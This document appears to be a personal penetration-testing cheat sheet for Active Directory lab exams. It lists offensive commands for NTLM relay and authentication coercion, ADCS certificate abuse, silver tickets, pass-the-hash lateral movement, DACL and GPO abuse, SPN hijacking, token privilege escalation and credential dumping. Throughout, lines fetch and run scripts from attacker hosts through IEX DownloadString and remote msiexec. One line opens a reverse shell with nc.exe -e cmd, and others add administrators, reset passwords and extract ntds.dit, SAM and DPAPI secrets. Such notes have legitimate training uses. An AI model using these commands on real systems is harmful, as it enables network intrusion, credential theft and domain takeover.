sed -i "s/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/" /etc/responder/Responder.conf
responder -I tun0

# ntlmrelayx
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c
impacket-ntlmrelayx -smb2support -tf relayTargets.txt -c

# socks
## SMB
impacket-ntlmrelayx -smb2support -tf relayTargets.txt -socks
## MSSQL
impacket-ntlmrelayx -t "mssql://172.50.0.30" -smb2support -socks

# add computer
impacket-ntlmrelayx -t ldap://172.16.119.3 -smb2support --no-da --no-acl --add-computer 'plaintext$'
# PC account escalate
impacket-ntlmrelayx -t ldap://172.16.117.3 -smb2support --escalate-user 'plaintext$' --no-dump -debug

# start relay
python3 PetitPotam.py -u 'plaintext$' -p 'Password123!' -d 'lab.local' <My_IP> 172.16.119.70
coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
python3 printerbug.py inlanefreight/plaintext$:'MTXr3(GW)lnljOj'@172.16.119.70 <My_IP>
## pipe
python printerbug.py user:'Pass123'@10.0.10.21 10.0.10.21/pipe/test

ESC 8

# HTTP Endpoint
curl -I http://172.16.117.3/certsrv/

# Relay
impacket-ntlmrelayx -t http://172.16.117.3/certsrv/certfnsh.asp -smb2support --adcs --template "Machine"
# Authentication Coercion
## EfsRpcAddUsersToFile, EfsRpcQueryRecoveryAgents
coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v 
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v --filter-method-name EfsRpcAddUsersToFile
python3 printerbug.py inlanefreight/plaintext$:'MTXr3(GW)lnljOj'@172.16.119.70 <My_IP>
# pfx

echo -n "MIIRPQIBAzCCEPcGCSqGSIb3DQEHAaCCEOgEghDkMIIQ4DCCBxcGCSqGSIb3DQEHBqCCBwgwggcEAgEAMI<SNIP>U6EWbi/ttH4BAjUKtJ9ygRfRg==" | base64 -d > ws01.pfx

certipy relay -target "http://172.16.119.3" -template Machinene

coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v 

certipy auth -pfx backup01.pfx -dc-ip 172.16.119.3

Silver Ticket

impacket-lookupsid 'INLANEFREIGHT.LOCAL\backup01$'@172.16.119.3 -hashes :11d2b884b8b3383ace4a68b8e1d23a8f
impacket-ticketer -nthash 11d2b884b8b3383ace4a68b8e1d23a8f -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local Administrator
impacket-ticketer -nthash 11d2b884b8b3383ace4a68b8e1d23a8f -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local -groups 1104,512,519 -user-id 1108 myuser

# vim /etc/hosts to backup01.inlanefreight.local
KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass backup01.inlanefreight.local

ESC11

certipy relay -target "rpc://172.16.119.3" -ca "INLANEFREIGHT-DC01-CA"

coercer scan -t 172.16.119.70 -u 'plaintext$' -p 'MTXr3(GW)lnljOj' -d INLANEFREIGHT.LOCAL -v
coercer coerce -l MY_IP -t 172.16.19.3 -u own -p 'Password1' -d lab.local -v 

certipy auth -pfx backup01.pfx -dc-ip 172.16.119.3

Inveigh

wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
Start-Job {Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y}
Start-Job {Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y}


wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.10/Inveigh-net4.6.2-v2.0.10.zip
unzip Inveigh-net4.6.2-v2.0.10.zip
Start-Job {.\Inveigh.exe -Console 5 -NBNS y -FileOutput y -LogOutput y}
Receive-Job -Id
Stop-Job -Id

PsExec

wget https://download.sysinternals.com/files/PSTools.zip

.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd

wget https://github.com/maaaaz/impacket-examples-windows/raw/master/psexec.exe
.\psexec.exe htb.local/tom_admin@10.10.164.146 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

# PTH
net use \\files04
.\PsExec64.exe \\PC1 cmd --accepteula

winRM

# winrm
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$Command = 'powershell -nop -w hidden -e';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

# winrs 
winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e "

# restrict ticket on host RDP
.\Rubeus.exe asktgt /user:leonvqz /rc4:32323DS033D176ABAAF6BEAA0AA681400 /nowrap
.\Rubeus.exe createnetonly /program:powershell.exe /show
.\Rubeus.exe ptt /ticket:
Enter-PSSession SRV02.oscp.exam -Authentication Negotiate

DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e   ","7")

$mmc = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","172.20.0.52"));
$mmc.Document.ActiveView.ExecuteShellCommand("powershell.exe",$null,"-e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==",0)

RunasCs

https://github.com/antonioCoco/RunasCs

.\RunasCs.exe username password cmd.exe -r 10.10.14.83:7777

TightVNC

https://github.com/frizb/PasswordDecrypts

reg query HKLM\SOFTWARE\TightVNC\Server /s
echo -n 816ECB5CE758EAAA | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

# Linux
apt-get install xtightvncviewer
echo VNCFake1 | proxychains4 -q vncviewer 172.20.0.52 -autopass -quality 0 -nojpeg -compresslevel 1 -encodings "tight hextile" -bgr233

Invoke-TheHash

https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash 2b576acbe6bcfda7294d6bd18041b8fe -Command "net localgroup Administrators own_user /add"

Discovery

Windows

LOLBIN

# AD Module
Import-Module ActiveDirectory

# admin
Get-ADGroup -Filter "adminCount -eq 1" | select Name
# Group joined Harry Jones
Get-ADGroup -Filter 'member -RecursiveMatch "CN=Harry Jones,OU=Network Ops,OU=IT,OU=Employees,DC=INLANEFREIGHT,DC=LOCAL"'
Get-ADGroup -LDAPFilter '(member:1.2.840.113556.1.4.1941:=CN=Harry Jones,OU=Network Ops,OU=IT,OU=Employees,DC=INLANEFREIGHT,DC=LOCAL)' |select Name
# description
Get-ADUser -Properties * -LDAPFilter '(&(objectCategory=user)(description=*))' | select samaccountname,description
# SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# ASREPRoast
Get-ADUser -Filter {DoesNotRequirePreAuth -eq 'True'}
# trusted for delegation
Get-ADUser -Properties * -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
Get-ADComputer -Properties * -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

# DACL
## Enum to user01
dsacls.exe ' CN=user01,CN=Users,DC=INLANEFREIGHT,DC=LOCAL'

# Arch
(Get-ComputerInfo).OsArchitecture

PowerView

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview

Ghost
https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/Get-ConstrainedDelegation.ps1

LAPS(Get-LAPSComputers)
https://github.com/leoloobeek/LAPSToolkit/raw/refs/heads/master/LAPSToolkit.ps1

cd /usr/share/windows-resources/powersploit/Recon/
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerView.ps1')

# cmd
Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp,useraccountcontrol
Get-NetSession -Verbose -ComputerName web04 

Get-LocalGroupMember Administrators
Find-LocalAdminAccess
Find-DomainUserLocation
Invoke-UserHunter
Get-NetUser -SPN -Properties samaccountname,serviceprincipalname

# discription
Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}
# AS-REP-roastable
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# Kerberoastable
Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname,memberof
Invoke-Kerberoast

# Delegation 
## 制約なし
Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" 
## 制約ある
Get-DomainUser -TrustedToAuth -Properties samaccountname,useraccountcontrol,memberof,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth -Property dnshostname,useraccountcontrol,msds-allowedtodelegateto
## Ghost
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.96/Get-ConstrainedDelegation.ps1')
Get-ConstrainedDelegation -CheckOrphaned

# GenericAll to User
$geneall = Get-ObjectAcl -Identity "UserName" | ?{$_.ActiveDirectoryRights -eq "GenericAll"} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value
Convert-SidToName $geneall

# DCSync
$dcsync = Get-ObjectACL "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value
Convert-SidToName $dcsync

# DACL
$userSID = (Get-DomainUser -Identity own_user).objectsid
Get-DomainObjectAcl | ?{$_.SecurityIdentifier -eq $userSID}
Get-DomainObjectAcl -Identity target_user | ?{$_.SecurityIdentifier -eq $userSID}

# Current User DACL
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

winPEAS

# on nc.exe
cd /usr/share/peass/winpeas
iwr -Uri http:// -Outfile winPEASany.exe
# on powershell
iwr -Uri http:// -Outfile winPEAS.bat

Powerless

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

wget https://raw.githubusercontent.com/gladiatx0r/Powerless/master/Powerless.bat

token

Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

Sherlock

https://github.com/rasta-mouse/Sherlock

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.36/Sherlock.ps1'); Find-AllVulns

PrivescCheck

https://github.com/itm4n/PrivescCheck

wget https://github.com/itm4n/PrivescCheck/releases/download/2025.10.06-1/PrivescCheck.ps1

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.36/PrivescCheck.ps1'); Invoke-PrivescCheck

Snaffler

Share Folder

wget https://github.com/SnaffCon/Snaffler/releases/download/1.0.150/Snaffler.exe

.\Snaffler.exe -d oscp.exam -v data

LaZagne

Credential Discovery

.\lazagne.exe all

BloodHound

Sharphound

# Sharphound
cd /usr/share/sharphound/
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -Domain htb.local -DomainController 10.10.10.1 -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "Name"

.\SharpHound.exe -c All -d htb.local --domainController 10.10.10.1 -o 
.\SharpHound.exe -c All -s --recursedomains

# rusthound
./rusthound_musl -d streamio.htb -i 10.10.11.158 -u 'JDgodd@streamIO.htb' -p 'JDg0dd1s@d0p3cr3@t0r' -z --adcs --ldaps

# bloodhound-ce-python
bloodhound-ce-python -c all -u enox -p california -d heist.offsec -ns 192.168.171.165 --zip
KRB5CCNAME=krb5cc_75401222_O9fxeC bloodhound-ce-python -c all -u user -k -no-pass -d htb.htb -ns 172.16.108.168 --zip

neo4j

MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

# AS-REP-roastable
MATCH (u:User {dontreqpreauth: true}) RETURN u

# Kerberoastable 
MATCH (u:User) WHERE u.hasspn=true RETURN u

# WinRM
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

# MSSQL SQLAdmin
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

# description
MATCH (u:User) WHERE u.description IS NOT NULL RETURN u

# Delegation unconstrained
MATCH (c:Computer {unconstraineddelegation:true}) return c

# ANY PATH
MATCH p = shortestPath((n)-[*1..]->(c)) WHERE n.name =~ '(?i)ここにUser名.*' AND NOT c=n RETURN p

Userlist

jq '.nodes[].label'

findDelegation

# vim /etc/hosts
impacket-findDelegation htb.LOCAL/user:pass

HostRecon

https://github.com/dafthack/HostRecon/blob/master/HostRecon.ps1

wget https://github.com/dafthack/HostRecon/raw/refs/heads/master/HostRecon.ps1

Invoke-HostRecon

cmd

# Users file
tree /f
Get-ChildItem -force
# hidden tree
function Show-Tree {
    param (
        [string]$Path = ".",
        [int]$Level = 0
    )
    $indent = " " * ($Level * 2)
    Get-ChildItem -Path $Path -Force | ForEach-Object {
        Write-Output "$indent|- $_"
        if ($_.PSIsContainer) {
            Show-Tree -Path $_.FullName -Level ($Level + 1)
        }
    }
}
Show-Tree -Path "C:\Users"
# hidden
dir /a

#Path
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

# File Credential
Get-Childitem -Path C:\windows.old -Include *SAM -Recurse -force -ErrorAction SilentlyContinue

findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml
findstr /spin "password" *.*
findstr /si pass *.txt *.ini *.config *.bat *.ps1 *.vbs

where /R C:\ *.config

# savecred
cmdkey /list
runas /savecred /user:oscp\bob "COMMAND HERE"

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Powershell History
(Get-PSReadLineOption).HistorySavePath

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

# localadmin
net localgroup administrators

# Powershell Passwsord XML
$credential = Import-Clixml -Path ".\connection.xml"
$credential.GetNetworkCredential().password

$secureString = $credential.Password
$plainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
echo $plainTextPassword

$password = '01000000d08c9d...';
$secureString = ConvertTo-SecureString $password -Force;
$plainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))

# Eventlog
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# install Service
wmic product get name

# Port
netstat -ano
tasklist /svc /FI "PID eq 336"

# share
net share

# printer pipe
dir \\dc01\pipe\spoolss

# Writeable folder
icacls C:\xampp\
accesschk.exe "user" C:\Windows -wus

# dpapi
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
dir C:\Users\USER\AppData\Roaming\Microsoft\Protect\
dir C:\Users\USER\AppData\Local\Microsoft\Protect\
.\SharpDPAPI.exe triage
## decrypt
impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'pass' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
impacket-dpapi credential -f C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fb

.\SharpDPAPI.exe credentials /password:'pass' /unprotect

# AD Delete Object
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Restore-ADObject -Identity f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Enable-ADAccount -Identity f80369c8-96a2-4a7f-a56c-9c15edd7d1e3

# OS version
systeminfo
$currentVersion = Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
$buildString = "$($currentVersion.CurrentBuild).$($currentVersion.UBR)"
Write-Output $buildString

# ticket purge
klist purge

# pass to the hash
printf "%s" 'pass' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4

Linux

cmd

# Port
ss -anp

# find
find / -writable -type d 2>/dev/null
find / -iname "*admin*" 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

# cron
cd /etc/crond.d

linpeas

cd /usr/share/peass/linpeas

pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32

Other

git

# git dump
git clone https://github.com/internetwache/GitTools.git
cd GitTools/Dumper 
./gitdumper.sh http://pilgrimage.htb/.git/ web

# git
git clone https://github.com/arthaud/git-dumper
cd git-dumper 
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
./git_dumper.py http://pilgrimage.htb/.git/ web

# cmd
git status
git log
git show [commit]
git reset --hard
git checkout .

Privilege Escalation

Windows

PowerUp

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

cd /usr/share/windows-resources/powersploit/Privesc/
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerUp.ps1')

# AllChecks
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerUp.ps1'); Invoke-AllChecks

# john Password123!

# Binary Hijacking
Get-ModifiableServiceFile
## AbuseFunction
Install-ServiceBinary -Name ''

# UnquotedService
Get-UnquotedService
## AbuseFunction  
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

SharpUp

Ghostpack

.\SharpUp.exe audit

AlwaysInstallElevated

git clone https://github.com/KINGSABRI/MSI-AlwaysInstallElevated
cd MSI-AlwaysInstallElevated

vim WXS-Templates/alwaysInstallElevated-3.wxs

wixl -v WXS-Templates/alwaysInstallElevated-3.wxs -o alwaysInstallElevated.msi
msiexec /qn /i http://192.168.45.240/alwaysInstallElevated.msi

<!-- alwaysInstallElevated-3.wxs -->

<File Id="File0" Name="setup.exe" Source="custom_revshell.exe" /> <!-- Put the executable on the same directory-->

Abuse DACLs

Default

Set SPN GenericAll, GenericWrite, WriteProperty, WriteSPN, Validated-SPN

# PowerView
Set-DomainObject -Identity target_user -Set @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose
Get-DomainUser target_user -SPN | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash
Set-DomainObject -Identity target_user -Clear serviceprincipalname -Verbose

# bloodyAD
bloodyAD --host 172.16.1.15 -d inlanefreight.local -u david -p 'Password123!' set object target_user servicePrincipalName -v fake/web01.inlanefreight.local

Reset Password GenericAll, AllExtendedRights, User-Force-Change-Password

Set-ADAccountPassword target_user -NewPassword $((ConvertTo-SecureString 'Password123!' -AsPlainText -Force)) -Reset -Verbose

# PowerView
Set-DomainUserPassword -Identity target_user -AccountPassword $((ConvertTo-SecureString 'Password123!' -AsPlainText -Force)) -Verbose

# net rpc
net rpc password target_user 'Password123!' -U inlanefreight.local/own_user%'Password1' -S 10.129.205.81

# rpcclient
rpcclient -U INLANEFREIGHT/own_user%Password1 10.129.205.81
setuserinfo2 target_user 23 Password123!

# bloodyAD
bloodyAD --host 172.16.1.15 -d inlanefreight.local  -u svc_sql -p 'XXX' set password david 'Password123!'

WriteDACL

# Group Add
impacket-dacledit -principal own_user -target "Managers" -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action write

net rpc group addmem "Managers" "own_user" -U inlanefreight.local/own_user%Password1 -S 10.129.205.81
## bloodyAD
bloodyAD --host 172.16.224.100 -d inlanefreight.local -u own_user -p XO7_mh6OnlL5_4 add groupMember "target_grp" target_user

# Password Reset
impacket-dacledit -principal own_user -target "kenta" -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action write

rpcclient -U INLANEFREIGHT/own_user%Password1 10.129.205.81
setuserinfo2 kenta 23 Password1

# GenericAll
## PowerView
Add-DomainObjectAcl -TargetIdentity target_user -PrincipalIdentity own_user -Rights All

Own Target

impacket-dacledit -principal own_user -target "Managers" -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action 'write'

net rpc group addmem "Managers" "own_user" -U inlanefreight.local/own_user%Password1 -S 10.129.205.81
## bloodyAD
bloodyAD --host 172.16.224.100 -d inlanefreight.local -u own_user -p XO7_mh6OnlL5_4 add groupMember "target_grp" target_user

# PowerView
Add-DomainGroupMember -Identity MicrosoftSync -Members remote_svc$ -Verbose

WriteOwner

impacket-owneredit -action write -new-owner own_user -target target_user -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1

impacket-dacledit -principal own_user -target target_user -dc-ip 10.129.205.81 inlanefreight.local/own_user:Password1 -action write

Shadow Credential

GenericAll, GenericWrite WriteProperty

https://github.com/ShutdownRepo/pywhisker
https://github.com/dirkjanm/PKINITtools

# Get pfx
python3 pywhisker.py -d "certified.htb" -u "JUDITH.MADER" -p "judith09" --target "MANAGEMENT_SVC" --action "add" --filename management

# In PKINITtools
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python3 gettgtpkinit.py -cert-pfx management.pfx -pfx-pass p9bX29Eozi8fT3CEpSvL certified.htb/MANAGEMENT_SVC MANAGEMENT_SVC.ccache
# key is in gettgtpkinit.py output
KRB5CCNAME=MANAGEMENT_SVC.ccache python3 getnthash.py -key c5b9e16f65d7f78cf15c8b185bfb75b2d1df367d1f3091392d336a7130669bef certified.htb/MANAGEMENT_SVC

Script-Path

Enum

# permission
impacket-dacledit -principal own_user -target 'target' -dc-ip 10.129.229.224  inlanefreight.local/own_user:'pass'
smbcacls //10.129.229.224/NETLOGON /targetScripts -U own_user%'pass'

# scriptPath
ldapsearch -LLL -H ldap://10.129.229.224 -x -D 'own_user@inlanefreight.local' -w 'SecurePassJul!08' -b "DC=inlanefreight,DC=local" "(sAMAccountName=target)" scriptPath

# logon script and smbclient put
vim logon.bat

Modify - GenericWrite, WriteProperty, or Object-type:ScriptPath, User

# logonScript.ldif
dn: CN=target,CN=Users,DC=inlanefreight,DC=local
changetype: modify
replace: scriptPath
scriptPath: targetScripts\logon.bat

ldapmodify -H ldap://10.129.229.224 -x -D 'own_user@inlanefreight.local' -w 'pass' -f logonScript.ldif

Hijack SPN

WriteSPN, WriteProperty, GenericWrite and Delegate (TrustedToAuth)

##### Ghost
```powershell
# Hijack Ghost
wget https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/Get-ConstrainedDelegation.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.96/Get-ConstrainedDelegation.ps1')
Get-ConstrainedDelegation -CheckOrphaned
# WriteSPN
Get-DomainObjectAcl -Identity target_PC | ?{$_.ActiveDirectoryRights -eq 'WriteProperty'}
# SPN memo
Get-DomainComputer target_PC | Select-Object -ExpandProperty serviceprincipalname

# Set SPN
Set-DomainObject -Identity target_PC -Set @{serviceprincipalname='dhcp/Ghost_PC'} -Verbose

# Get Ticket
.\Rubeus.exe s4u /domain:inlanefreight.local /user:OWN_PC$ /rc4:OWN_PC /impersonateuser:administrator /msdsspn:"dhcp/Ghost_PC" /nowrap
.\Rubeus.exe tgssub /ticket:<ghost_ticket> /altservice:cifs/target_PC /nowrap
.\Rubeus.exe ptt /ticket:<new_ticket>

Live Hijack

# Delegation
## Get Hijack PC
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.96/Get-ConstrainedDelegation.ps1')
Get-ConstrainedDelegation
# WriteSPN
## Hijack PC
Get-DomainObjectAcl -Identity Hijack_PC | ?{$_.ActiveDirectoryRights -eq 'WriteProperty'}
## target_PC
Get-DomainObjectAcl -Identity target_PC | ?{$_.ActiveDirectoryRights -eq 'WriteProperty'}
# SPN memo
(Get-DomainComputer Hijack_PC).serviceprincipalname

# Clear SPN
Set-DomainObject -Identity Hijack_PC -Clear 'serviceprincipalname' -Verbose
# Set SPN
Set-DomainObject -Identity target_PC -Set @{serviceprincipalname='MSSQL/Hijack_PC'} -Verbose

# Get Ticket
## req rc4
.\Rubeus.exe hash /domain:inlanefreight.local /user:OWN_PC$ /password:'Password123!'
## Ticket by Rubeus
.\Rubeus.exe s4u /domain:inlanefreight.local /user:OWN_PC$ /rc4:OWN_PC /impersonateuser:administrator /msdsspn:"MSSQL/Hijack_PC" /nowrap
.\Rubeus.exe tgssub /ticket:<hijack_ticket> /altservice:HTTP/target_PC /nowrap
.\Rubeus.exe ptt /ticket:<new_ticket>
## Ticket by impacket
impacket-getST -spn 'MSSQLSvc/Hijack_PC' -impersonate Administrator 'inlanefreight.local/OWN_PC$' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 172.19.99.10
### alt ticket
git clone -b tgssub https://github.com/ShutdownRepo/impacket/ tgssub
python3 tgssub/examples/tgssub.py -in 'Administrator@MSSQLSvc_db2000@INLANEFREIGHT.LOCAL.ccache' -altservice "cifs/target_PC" -out newticket.ccache 
#### vim /etc/hosts
KRB5CCNAME=newticket.ccache impacket-smbexec -k -no-pass SDE01


# Restore SPN
cat SPN.txt | awk '{printf "\x27%s\x27,", $0}'
## Remove hijack SPN
Set-DomainObject -Identity Hijack_PC -Set @{
serviceprincipalname=...
} -Verbose

# WinRM
Enter-PSSession -ComputerName target_PC

abuse GPO

https://github.com/juliourena/plaintext/blob/master/Powershell/Get-GPOEnumeration.ps1

# Modify GPO priv
Get-GPOEnumeration
# Link GPOs priv
Get-GPOEnumeration -LinkGPOs
# Create GPO priv
Get-GPOEnumeration -CreateGPO

# where OU are PC
Get-DomainOU | foreach { $ou = $_.distinguishedname; Get-DomainComputer -SearchBase $ou -Properties dnshostname | select @{Name='OU';Expression={$ou}}, @{Name='FQDN';Expression={$_.dnshostname}} }

# Create GPO
New-GPO -Name TestGPO -Comment "This is a test GPO."
# Create GPO link
New-GPLink -Name TestGPO -Target "OU=TestOU,DC=inlanefreight,DC=local"

# Abuse GPO add local admin 
## --force
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount own_user --GPOName "TestGPO"

LOLBIN

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

# Binary Hijacking
## === Modifiable Service Binaries ===
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\xampp\mysql\bin\mysqld.exe"
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
net stop mysql
shutdown /r /t 0 

# tasks
schtasks /query /fo LIST /v
Get-ScheduledTask

## Watch
wget https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1
Get-Process -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 20

#checkcmdline
IEX (iwr 'http://10.10.10.205/check_cmdline.ps1') 

# Services
# === Modifiable Services ===
sc config WindscribeService binpath="cmd /c net localgroup administrators my /add"
sc stop WindscribeService
sc start WindscribeService

token

# PrintSpoofer
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe

# GodPotato
cd /usr/share/windows-resources/binaries/
.\GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe 10.10.14.83 9999 -e cmd"

# SharpToken
cd /usr/share/windows-resources/binaries/
.\SharpToken.exe list_token
.\SharpToken.exe execute "NT AUTHORITY\SYSTEM" cmd true
.\SharpToken.exe add_user admin Abcd1234! Administrators

SePriv

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown

takeown /f 'C:\Department Shares\Private\IT\cred.txt'
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

BackupPrivilege

https://github.com/giuliano108/SeBackupPrivilege

PS C:\htb> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\htb> Import-Module .\SeBackupPrivilegeCmdLets.dll

PS C:\htb> Set-SeBackupPrivilege
PS C:\htb> Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

https://book.hacktricks.xyz/v/jp/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

#ntds.dit
C:\Windows\Temp> diskshadow.exe /s z.dsh
C:\Windows\Temp> robocopy /B z:\Windows\NTDS .\ntds ntds.dit

# SAM SYSTEM
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

z.dsh

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:

unix2dos z.dsh

LoadDriver

